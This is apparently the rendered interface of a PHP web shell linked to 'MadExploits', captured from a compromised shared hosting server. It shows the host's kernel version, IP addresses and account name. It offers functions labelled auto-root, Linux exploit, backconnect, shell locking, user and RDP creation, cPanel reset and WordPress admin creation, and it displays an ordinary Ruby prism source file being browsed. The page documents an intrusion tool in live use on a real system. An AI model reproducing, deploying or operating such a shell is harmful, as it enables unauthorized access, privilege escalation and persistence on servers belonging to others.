Linux server241.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 199.188.200.87 | : 216.73.216.149
Cant Read [ /etc/named.conf ]
8.0.30
emerlyju
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby34 /
share /
ruby /
prism /
[ HOME SHELL ]
Name
Size
Permission
Action
parse_result
[ DIR ]
drwxr-xr-x
polyfill
[ DIR ]
drwxr-xr-x
translation
[ DIR ]
drwxr-xr-x
compiler.rb
23.76
KB
-rw-r--r--
desugar_compiler.rb
9.89
KB
-rw-r--r--
dispatcher.rb
111.71
KB
-rw-r--r--
dsl.rb
56.77
KB
-rw-r--r--
ffi.rb
19.42
KB
-rw-r--r--
inspect_visitor.rb
124.61
KB
-rw-r--r--
lex_compat.rb
32.44
KB
-rw-r--r--
mutation_compiler.rb
21.1
KB
-rw-r--r--
node.rb
588.89
KB
-rw-r--r--
node_ext.rb
14.97
KB
-rw-r--r--
pack.rb
5.88
KB
-rw-r--r--
parse_result.rb
29.38
KB
-rw-r--r--
pattern.rb
8.16
KB
-rw-r--r--
reflection.rb
28.82
KB
-rw-r--r--
relocation.rb
15.12
KB
-rw-r--r--
serialize.rb
124.59
KB
-rw-r--r--
string_query.rb
775
B
-rw-r--r--
translation.rb
586
B
-rw-r--r--
visitor.rb
24.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : string_query.rb
# frozen_string_literal: true # :markup: markdown module Prism # Query methods that allow categorizing strings based on their context for # where they could be valid in a Ruby syntax tree. class StringQuery # The string that this query is wrapping. attr_reader :string # Initialize a new query with the given string. def initialize(string) @string = string end # Whether or not this string is a valid local variable name. def local? StringQuery.local?(string) end # Whether or not this string is a valid constant name. def constant? StringQuery.constant?(string) end # Whether or not this string is a valid method name. def method_name? StringQuery.method_name?(string) end end end
Close